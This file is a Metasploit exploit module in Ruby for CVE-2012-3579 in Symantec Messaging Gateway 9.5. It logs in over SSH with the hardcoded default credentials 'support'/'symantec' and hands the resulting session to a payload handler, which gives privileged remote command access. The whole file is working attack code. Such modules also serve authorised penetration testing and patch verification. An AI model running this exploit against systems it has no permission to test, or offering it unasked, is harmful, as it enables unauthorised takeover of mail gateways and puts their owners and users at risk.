1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'net/ssh'
7
require 'net/ssh/command_stream'
8

9
class MetasploitModule < Msf::Exploit::Remote
10
  Rank = ExcellentRanking
11

12
  include Msf::Exploit::Remote::SSH
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability',
19
        'Description' => %q{
20
          This module exploits a default misconfiguration flaw on Symantec Messaging Gateway.
21
          The 'support' user has a known default password, which can be used to login to the
22
          SSH service, and gain privileged access from remote.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => [
26
          'Stefan Viehbock', # Original discovery
27
          'Ben Williams',    # Reporting the vuln + coordinated release
28
          'sinn3r'           # Metasploit
29
        ],
30
        'References' => [
31
          ['CVE', '2012-3579'],
32
          ['OSVDB', '85028'],
33
          ['BID', '55143'],
34
          ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'],
35
          ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
36
        ],
37
        'DefaultOptions' => {
38
          'EXITFUNC' => 'thread'
39
        },
40
        'Payload' => {
41
          'Compat' => {
42
            'PayloadType' => 'cmd_interact',
43
            'ConnectionType' => 'find'
44
          }
45
        },
46
        'Platform' => 'unix',
47
        'Arch' => ARCH_CMD,
48
        'Targets' => [
49
          ['Symantec Messaging Gateway 9.5', {}],
50
        ],
51
        'Privileged' => true,
52
        # Timestamp on Symantec advisory
53
        # But was found on Jun 26, 2012
54
        'DisclosureDate' => '2012-08-27',
55
        'DefaultTarget' => 0,
56
        'Notes' => {
57
          'Stability' => [CRASH_SAFE],
58
          'Reliability' => [REPEATABLE_SESSION],
59
          'SideEffects' => []
60
        }
61
      )
62
    )
63

64
    register_options([
65
      Opt::RPORT(22)
66
    ])
67

68
    register_advanced_options([
69
      OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
70
      OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
71
    ])
72
  end
73

74
  def do_login(user, pass)
75
    opts = ssh_client_defaults.merge({
76
      auth_methods: ['password', 'keyboard-interactive'],
77
      port: rport,
78
      password: pass
79
    })
80

81
    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
82

83
    begin
84
      ssh = nil
85
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
86
        ssh = Net::SSH.start(rhost, user, opts)
87
      end
88
    rescue Rex::ConnectionError
89
      return
90
    rescue Net::SSH::Disconnect, ::EOFError
91
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
92
      return
93
    rescue ::Timeout::Error
94
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
95
      return
96
    rescue Net::SSH::AuthenticationFailed
97
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
98
    rescue Net::SSH::Exception => e
99
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
100
      return
101
    end
102

103
    if ssh
104
      conn = Net::SSH::CommandStream.new(ssh, logger: self)
105
      ssh = nil
106
      return conn
107
    end
108

109
    return nil
110
  end
111

112
  def exploit
113
    user = 'support'
114
    pass = 'symantec'
115

116
    print_status("#{rhost}:#{rport} - Attempt to login...")
117
    conn = do_login(user, pass)
118
    if conn
119
      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
120
      handler(conn.lsock)
121
    end
122
  end
123
end
124

125